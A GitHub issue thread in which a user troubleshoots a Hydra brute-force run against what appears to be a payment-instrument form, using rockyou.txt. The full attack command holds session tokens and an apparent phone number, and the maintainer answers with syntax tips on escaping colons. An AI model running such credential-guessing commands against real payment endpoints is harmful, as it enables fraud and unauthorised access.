Hydra-wizard not taking full command input

[Aviril7]

Am running Hydra v9.4 with the following command

┌──(root㉿localhost)-[/home/kali]
└─# hydra-wizard

Welcome to the Hydra Wizard

Enter the service to attack (eg: ftp, ssh, http-post-form): https-post-form
Enter the target to attack (or filename with targets): website.com
Enter a username to test or a filename: Aviril
Enter a password to test or a filename: rockyou.txt
If you want to test for passwords (s)ame as login, (n)ull or (r)everse login, enter these letters without spaces (e.g. "sr") or leave empty otherwise:
Port number (press enter for default): 443

The following options are supported by the service module:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 22:16:41

Help for module https-post-form:
============================================================================
Module http-post-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with url-encoded (resp. base64-encoded) usernames and passwords being replaced in the
 "^USER^" (resp. "^USER64^") and "^PASS^" (resp. "^PASS64^") placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter! Add the -d switch to see
the sent/received data!

The following parameters are optional:
 2=                  302 page forward return codes identify a successful attempt
 (c|C)=/page/uri     to define a different page to gather initial cookies from
 (g|G)=              skip pre-requests - only use this when no pre-cookies are required
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER[64]^ and ^PASS[64]^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end

Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons
 in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"
 "/login.php:user=^USER64^&pass=^PASS64^&colon=colon\:escape:S=authlog=.*success"
 "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
 "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^:H=User-Agent\: wget"
 "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

If you want to add module options, enter them here (or leave empty): /efe/payments/u/0/instrument_ma
nager_save_page?ait=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wb
GF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3A%2F%2Fwebsite.com&si=7718577566567739&style
=%3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2:xsrf=AJWlU2NpXzuGH96X5xELXt
Ybe4k3rZV8QQ%3A1685556846298&3.1.0.0=^USER^&3.1.0.1=^PASS^&msg=%5B%5Bnull%2C%22ACo329zENGjYwuZVjgkpz
gbh4sJSp3yqI%2BszyCssX1fbb7YT3IJ1NetG6AD%2Fd6OsanPraj991B1KWvoq5Z3DdyBVJCHrLlBVUQQXLFW5PJOWvl4XFSR6IA
Y04oUIGui5O7QWLb3oxLMeYUav6Z1%2FEBDxjWD53PqCHG6WsbsOIl2mcWb%2BotJSH%2FXd59MZqp%2BBKqAGqX%2FiKhWMhu7r
ZlPSF4m2Ielh0ZAT%2BdIAL0khyh7rRHp%2F%2B2zVrd3e3CNkwgv3x6ChGujZmsOgVomD3R6sC1ZepY6cVOkRdPLfkX6a%2FLvA
RIEWPPM8aeLipIqNuRAmoS7HE3OfhhxzzMc6nA20CmmXywrpebnCHZL8R7hvYH2sgiB%2F5ldWYqX83S5D1sgKJKMwONwCsB0lr9
VLqNGGXN9VrhismLA9F0ay82wPJ%2Firmr1JFg3Ebw0ZiviyA3YemGooflzMg4IVbDjapyTW2vmZJ2MAbZ4t%2FQ3rtOXPjHWO%2
BTmhXM2F8iq64VMIQzREUlFL2sNgz2UF0vGfgFWRd9E9n7ivsFz4ISOAK8XZjgoQHERBzuNkQ9%2B%2BbVtzmxaW2TfPgVDLuXBF
hhc95WLVaRptvBR2guZV23A0MKe5j7MZQ7O%2F9imAZOxUpzvPghkMJjVh4IZkUMqhnhBPs94FF60Z7rYYRvp30GCHjS5z2q1Vmw
BtGk0OchRbdYcyHgDILzGmHjV9qDk5GC1YDHMWWElP%2FeobqlNbYn%2FgLUPritpe9Fq9qoA5WSQGGMT7ECfp%2F2f1NY4vWDYnl
aHInB%2Fcv09zk%2F8RRIX7Mfss3IoIwHMSqJxSPxkRGqRo3wbkda1pVBdaQVc7NQzFJw80ul0PCGH1YEWfXQ6mQMuEX42bPNhX6q
afm0N%2BJZgtV5LsuMTzplc3eMHfxN2UaVc2LYNYllFg8GhuB1lDaqiTM8h3aj6I151ftpzroknyZOrlpf8tnqTk16zchDdRGrCts
ixZ1mOxWdeNB4TAooTggU59Mlq1696sAiLzKnjDDXqjnEDpYLGRDliNhmwTRRq1EeljB%2Byfhvb%2FgeOQtsv8ieWXWxzZ8knqFH
CDAuvlKBiK6uGXnCetQy1Hd5yajFKtUz89geqIvXamFQ76YvGSPlE2ObfPNQc15o3yWeBZfQ%3D%22%2Cnull%2C%5Bnull%2C%5B
null%2Cnull%2Cnull%2C%5B%22!f3ylfCHNAAYldGN0BXRCgWWyzmqmH5w7ADkAIwj8RubCsM0nzhBzfEZtldsAnoOeg3XvqQaCJ
ZmIiBC_UNxAh-lgz2kQALM72SUFbXpS5xyAxyACAAAL7VIAAAA5aAEHmQU_xUFboyORBSx0eXK3eLWwW_cz30qSQPU-ZDVr79gIs-
6Ekol1fcwGdDkRL6Gjd_ZCW_hjDWmm73IuRBtV2p5ApZJz-UiiE7wFMm1k8Lll1i9q0l7xw3kwnlaqY109dG9i5VZaCYiK8BJsSxi
Kr_H4Hmk2L3oBvt3PeudLnVYZdsnt44bSHc1Hmrxy0W9jfqVjWBfetz6Q710fX2HuYTRMC8Fd9cCDRKGCD9VkN9Kqydn485iUXZtZ
oYxgg45PLvyc60JbJ4_Dp0lYi0c15KEW9-izpSx2ajTe5QDUN50hUxkPhr92vw0CSBQoNXKqLiM7eQA1pjj01WwS0QK-YLFHkLp9y
SnLoGzKasbIENSjf3l7Y1Ds5WILc66LfbBLy0ZmlOzpUgNLjIyZdqN8jMqvcNmmbarDgmNhVpsLdZS6kgHcLMlXNuVHHzz_EN2a0f
91t0yQrhKLqoedPYvFVV1881wTMp2auPCDsyh5j4PWlR_8rvsEw3XrOUoZW4m_sb5Yyp-uYvCW3wpXeTrvZBykHInnE935u-HlBq3
Xp-XfcEyMGceSpaUTPAPDmzoXrxxViaTDvENrN6WguqxPsln-9u3O2HKRQhtudhgosEx_ydILUYUhxJmS8LUpFwpsn9VlwgSd42Ry
tB7XPdeTRrKd11SuAxoToWKqGTxbdrxLXKZDXPhat_0rCGUbPEAe8JppNswkbLnjKaaisaRgpC_81kTEEUUudd9O498UfQKq-wrVU
n0oqGGM-pYhNYaDZ1CX1msb65HPRcD3dF4wlQlsntiFm6nY6Q22d9arQuIQf66GP4yp5p3tDCeGrqtu9xhRvpCrWHFK43JY0fTOUS
9wYzuC5-y4pCiNwfTjAva6hJ6xnFYSmwBifiapuYh_Muk2OalktXMyeYQWVVoEAGKPx2C5_lD6slaPmVviKMw1vw1CAcMnxiSK4hO
LMz0h9KnqN-hOUfrXxVeIUCnpIfNcuJ5HFUXOVOt-pKo7wj7thVNfGajMMUv70gYeLlkLZ14wuVdew5OiF4O07c1i0IaPwIKyLF3a
S2enkkaZKZhS2gIWlM9rrGHJod7-BuhWp1txprSQL9vkJjf2nTYSWjxhwMOGTop_6qM-ceHkFDBVFwsJ1AdFaK0oOjGUbt58-_Vxo
y0S535l7VZhkfvowPlWL3PNWhmc8vGPpSIaD1T1-KmZzENM5s2q-mRda7JVHQxzwb5OPSH0YpX0Xc1Z-YNkNtGLnfnEWTxWiJP3Ags
iNO_AEf4jvsiaERl83VDQgXZ2Sik4cwYJgPIv_1eVWSOJe9EfogV1s3stpPpJfSYNJOQf4foOINLmdZnBRhat4rwtzB4ltMgBcsYFN
Z8g7M5LOZY2GYwdbEk7xtgFFHXeKGjd7drhLpbFJqtjlbfiGc-sDRGenU3IJrAS1KDYglOkOQHaShh6A9vR7AmFSl8SLsNyo4g1QFe
XEGS-Q1EgOaQV7NwQEK5tAPKir1Nk-ZPBuszVDazVwN0XJ9JyOrV6NX3rbCSnfFKLgKpWfEaWzXD7P3Df9iqeKG-a6zC11xVqpTJTR
jnfrOXNSQiwsVLiLTN16T1JVIG_1fS9EtpTKd7xLG0_9GcRLvkP3UrR7i4wJaoRlkfjQjz_Ew55_Y8tSHIUel5PNeEMCpIIJeNS9rc
qxT9BrX6n7bDcV87GDrHf_p4bZlX8gdxUEPjXlahl69nZGuU4upf7d4CNE-IAXsuDeP92MpdKsrUWa8HaoRC2h7hfqtZrtjLIPugbl
zectJw0OZLNPXcWJ4SpFT7Acjc%22%5D%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2
Cnull%2C%5B%5D%5D%2Cnull%2Cnull%2C%22en-US%22%2C1%2C1%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5
B%5D%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2Cnull
%2Cnull%2C%5Bnull%2C%5B%5B%22__secure_field__4fa1d0a7%22%2C%22__secure_field__4fa1d0a7%22%2C3%2C2026%2
Cnull%2C%220754%22%2Cnull%2C%22__s7e_data__61bb463a%22%2C%22%20%22%2C%5B%5B%22NG%22%2Cnull%2Cnull%2Cnu
ll%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2C%22%2B234%20812%20995%
204327%22%2Cnull%2Cnull%2C%22%22%2Cnull%2C%22Cg0I3%2FbChP%2F%2F%2F%2F%2F%2FARAB%22%2C2001%2Cnull%2C%5B
%5D%5D%2C%22CAIQAhogEgJORxoDTkdOMAZAC1ABYM6jBGoCCgCgARSoARSwARQ%3D%22%2C%220.buyertos%2FZZ%2F6%2F4%2Fe
n%2C0.privacynotice%2FZZ%2F5%2F6%2Fen-GB%22%2C%2%22%2C%5B%5D%5D%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%
2C%5B%5D%5D%5D&kt=Rs2.0.6%v3%3A%3As11%2C2%2C26b5e19%2C1%2C5f0%2Ca063ebe9%2C0%2C2d0%2Cedd98bac%2C1%2C18
%2C4863fd35%2C0%2C5f0%2Ccb2d5c6f%2C1%2C2b3%2C6ad47c6c%2C0%2C1fc%2C7bdb49f6%2C0%2C96%2Cb6540200%2C1%2C5
00%2Ceea820b6%2C1%2C26d%2C1aa4331%2C0%2C%22Linux%20aarch64%2Caf794515%2C0%2C%225.0%2028X1129%2Cd81723d
1%2C0%2C%22en2dUS%2C5cc3ab5f%2C0%2C%22Mozilla2f5.0%2028X113b%20Linux%20aarch643b%20rv3a102.029%20Gecko
2f20100101%20Firefox2f102.0%2C24a66df6%2C1%2C-3c%2C%22Thu%20Jan%2001%201970%20013a003a00%20GMT2b0100%
2028West%20Africa%20Standard%20Time29%2C2ca0554f%2C%22PDF%20Viewer%2C1%2C%22Portable%20Document%20Fort
at%2C%22Chrome%20PDF%20Viewer%2C0%2C%22Portable%20Document%20Format%2C%22Chromium%20PDF%20View
er%2C0%2C%22Portable%20Document%20Format%2C%22Microsoft%20Edge%20PDF%20Viewer%2C0%2C%22Portable%20Doc
ument%20Format%2C%22WebKit%20built2din%20PDF%2C0%2C%22Portable%20Document%20Format%2C6c8b9d5b%2C770c6
7fc%2C1%2C8%3Aa21%2C3%2C18873046e99%2Cb%2C%22%2C%22ccmonth%2C%22ccyear%2C%22%2C%22ccname%2C%22COUNTRY
%2C%22RECIPIENT%2C%22PHONE_NUMBER%2C%22embedderHostOrigin%2C%22xsrf%2C%22sri%2C84%2C2f9%3Aa40%2C%22f%
2C18873047192%2C%22n%2C0%2C0%2C%22t%2C18873045a3e%2C0%2C0%2C0%2C0%2C18873045a3f%2C18873045a3f%2C18873
045a3f%2C18873045a3f%2C18873045a3f%2C18873045a3f%2C18873045aab%2C18873045ce1%2C18873045dec%2C18873045
d01%2C18873046ea8%2C18873046eac%2C188730471d7%2C1887304930c%2C1887304930c%2C18873049340%3Aa10%3Aa31%2
C3%2C%22h%2C1%2C%22p%2C3c%2C74%2C%22m%2C13%2C10%2C24%2C1b%2Ce%2Cf%2C15%2Cb%2C1a%2C10%2C8%2C12%2C10%2C
11%2C10%2Cdf%2C245%2C23%2C16%2C15%2Ce%2C13%2C13%2Cd%2Cd%2C13%2C15%2Cb%2Ce%2C12%2C15%2Cf%2Ce%2C10%2C10
%2C10%2C13%2C10%2C1c8%2C11%2C33%2C8%2C10%2C12%2C10%2C11%2C12%2Cf%2C10%2C11:F=invalid

The following command will be executed now:
 hydra -l Aviril -p rockyou.txt -u  -s 443 -m '/efe/payments/u/0/instrument_manager_save_page?ait=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%
2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3A%2F%2Fwebsite.com&si=7718577566567739&style=%
3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2:xsrf=AJWlU2NpXzuGH96X5xELXtYbe4k3rZV8QQ%3A1685556846298&3.1.0.0=^USE
R^&3.1.0.1=^PASS^&msg=%5B%5Bnull%2C%22ACo329zENGjYwuZVjgkpz4sJSp3yqI%2BszyCssX1fbb7YT3IJ1NetG6AD%2Fd6OsanPraj991B1KWvoq5Z3DdyBVJCHrLlBVUQQXL
FW5PJOWvl4XFSR6IAY04oUIGui5O7QWLb3oxLMeYUav6Z1%2FEBDxjWD53PqCHG6WsbsOIl2mcWb%2BotJSH%2FXd59MZqp%2BBKqAGqX%2FiKhWMhu7rZlPSF4m2Ielh0ZAT%2BdIAL
0khyh7rRHp%2F%2B2zVrd3e3CNkwgv3x6ChGujZmsOgVomD3R6sC1ZepY6cVOkRdPLfkX6a%2FLvARIEWPPM8aeLipIqNuRAmoS7HE3OfhhxzzMc6nA20CmmXywrpebnCHZL8R7hvYH2
sgiB%2F5ldWYqX83S5D1sgKJKMwONwCsB0lr9VLqNGGXN9VrhismLA9F0ay82wPJ%2Firmr1JFg3Ebw0ZiviyA3YemGooflzMg4IVbDjapyTW2vmZJ2MAbZ4t%2FQ3rtOXPjHWO%2BTm
hXM2F8iq64VMIQzREUlFL2sNgz2UF0vGfgFWRd9E9n7ivsFz4ISOAK8XZjgoQHERBzuNkQ9%2B%2BbVtzmxaW2TfPgVDLuXBFhhc95WLVaRptvBR2guZV23A0MKe5j7MZQ7O%2F9imAZ
OxUpzvPghkMJjVh4IZkUMqhnhBPs94FF60Z7rYYRvp30GCHjS5z2q1VmwBtGk0OchRbdYcyHgDILzGmHjV9qDk5GC1YDHMWWElP%2FeobqlNbYn%2FgLUPritpe9Fq9qoA5WSQGGMT7E
Cfp%2F2f1NY4vWDYnlaHInB%2Fcv09zk%2F8RRIX7Mfss3IoIwHMSqJxSPxkRGqRo3wbkda1pVBdaQVc7NQzFJw80ul0PCGH1YEWfXQ6mQMuEX42bPNhX6qafm0N%2BJZgtV5LsuMTzp
lc3eMHfxN2UaVc2LYNYllFg8GhuB1lDaqiTM8h3aj6I151ftpzroknyZOrlpf8tnqTk16zchDdRGrCtsixZ1mOxWdeNB4TAooTggU59Mlq1696sAiLzKnjDDXqjnEDpYLGRDliNhmwTR
Rq1EeljB%2Byfhvb%2FgeOQtsv8ieWXWxzZ8knqFHCDAuvlKBiK6uGXnCetQy1Hd5yajFKtUz89geqIvXamFQ76YvGSPlE2ObfPNQc15o3yWeBZfQ%3D%22%2Cnull%2C%5Bnull%2C%
5Bnull%2Cnull%2Cnull%2C%5B%22!f3ylfCHNAAYldGN0BXRCgWWyzmqmH5w7ADkAIwj8RubCsM0nzhBzfEZtldsAnoOeg3XvqQaCJZmIiBC_UNxAh-lgz2kQALM72SUFbXpS5xyAxy
ACAAAL7VIAAAA5aAEHmQU_xUFboyORBSx0eXK3eLWwW_cz30qSQPU-ZDVr79gIs-6Ekol1fcwGdDkRL6Gjd_ZCW_hjDWmm73IuRBtV2p5ApZJz-UiiE7wFMm1k8Lll1i9q0l7xw3kwnl
aqY109dG9i5VZaCYiK8BJsSxiKr_H4Hmk2L3oBvt3PeudLnVYZdsnt44bSHc1Hmrxy0W9jfqVjWBfetz6Q710fX2HuYTRMC8Fd9cCDRKGCD9VkN9Kqydn485iUXZtZoYxgg45PLvyc60
JbJ4_Dp0lYi0c15KEW9-izpSx2ajTe5QDUN50hUxkPhr92vw0CSBQoNXKqLiM7eQA1pjj01WwS0QK-YLFHkLp9ySnLoGzKasbIENSjf3l7Y1Ds5WILc66LfbBLy0ZmlOzpUgNLjIyZdq
N8jMqvcNmmbarDgmNhVpsLdZS6kgHcLMlXNuVHHzz_EN2a0f91t0yQrhKLqoedPYvFVV1881wTMp2auPCDsyh5j4PWlR_8rvsEw3XrOUoZW4m_sb5Yyp-uYvCW3wpXeTrvZBykHInnE9
35u-HlBq3Xp-XfcEyMGceSpaUTPAPDmzoXrxxViaTDvENrN6WguqxPsln-9u3O2HKRQhtudhgosEx_ydILUYUhxJmS8LUpFwpsn9VlwgSd42RytB7XPdeTRrKd11SuAxoToWKqGTxbdr
xLXKZDXPhat_0rCGUbPEAe8JppNswkbLnjKaaisaRgpC_81kTEEUUudd9O498UfQKq-wrVUn0oqGGM-pYhNYaDZ1CX1msb65HPRcD3dF4wlQlsntiFm6nY6Q22d9arQuIQf66GP4yp5p
3tDCeGrqtu9xhRvpCrWHFK43JY0fTOUS9wYzuC5-y4pCiNwfTjAva6hJ6xnFYSmwBifiapuYh_Muk2OalktXMyeYQWVVoEAGKPx2C5_lD6slaPmVviKMw1vw1CAcMnxiSK4hOLMz0h9K
nqN-hOUfrXxVeIUCnpIfNcuJ5HFUXOVOt-pKo7wj7thVNfGajMMUv70gYeLlkLZ14wuVdew5OiF4O07c1i0IaPwIKyLF3aS2enkkaZKZhS2gIWlM9rrGHJod7-BuhWp1txprSQL9vkJj
f2nTYSWjxhwMOGTop_6qM-ceHkFDBVFwsJ1AdFaK0oOjGUbt58-_Vxoy0S535l7VZhkfvowPlWL3PNWhmc8vGPpSIaD1T1-KmZzENM5s2q-mRda7JVHQxzwb5OPSH0YpX0Xc1Z-YNkNt
GLnfnEWTxWiJP3AgsiNO_AEf4jvsiaERl83VDQgXZ2Sik4cwYJgPIv_1eVWSOJe9EfogV1s3stpPpJfSYNJOQf4foOINLmdZnBRhat4rwtzB4ltMgBcsYFNZ8g7M5LOZY2GYwdbEk7xt
gFFHXeKGjd7drhLpbFJqtjlbfiGc-sDRGenU3IJrAS1KDYglOkOQHaShh6A9vR7AmFSl8SLsNyo4g1QFeXEGS-Q1EgOaQV7NwQEK5tAPKir1Nk-ZPBuszVDazVwN0XJ9JyOrV6NX3rbC
SnfFKLgKpWfEaWzXD7P3Df9iqeKG-a6zC11xVqpTJTRjnfrOXNSQiwsVLiLTN16T1JVIG_1fS9EtpTKd7xLG0_9GcRLvkP3UrR7i4wJaoRlkfjQjz_Ew55_Y8tSHIUel5PNeEMCpIIJe
NS9rcqxT9BrX6n7bDcV87GDrHf_p4bZlX8gdxUEPjXlahl69nZGuU4upf7d4CNE-IAXsuDeP92MpdKsrUWa8HaoRC2h7hfqtZrtjLIPugblzectJw0OZLNPXcWJ4SpFT7Acjc%22%5D%
5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2Cnull%2Cnull%2C%22en-US%22%2C1%2C1%2Cnull%2Cnull%2Cn
ull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2Cnull%2Cnull
%2C%5Bnull%2C%5B%5B%22__secure_field__4fa1d0a7%22%2C%22__secure_field__4fa1d0a7%22%2C3%2C2026%2Cnull%2C%220754%22%2Cnull%2C%22__s7e_data__61
bb463a%22%2C%22%20%22%2C%5B%5B%22NG%22%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2' website.com https-post-form

Do you want to run the command now? [Y/n] y

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 22:17:19
[ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /efe/payments/u/0/instrument_manager_save_page?a
it=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3
A%2F%2Fwebsite.com&si=7718577566567739&style=%3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2

If you notice, when it says The following command will be executed now the command that follows isn't the complete command I passed to hydra which makes it give the error ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /efe/payments/u/0/instrument_manager_save_page?a it=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3 A%2F%2Fwebsite.com&si=7718577566567739&style=%3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2

What am I doing wrong or how can I fix this?

[vanhauser-thc]

I think the line is just too long maybe.
just execute hydra from the command line directly with the parameters? you see the order of how you have to pass the parameters.

[Aviril7]

I have tried useing the command line but it still gives the same error [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: then I created a random string same length with the request I passed to hydra just to be sure and it worked perfectly.

Am thinking it has something to do with the codes in the request body

[vanhauser-thc]

colons that are not seperators for hydra options must be escaped with a backslash,e .g.

"foo: bar" -> "foo: bar"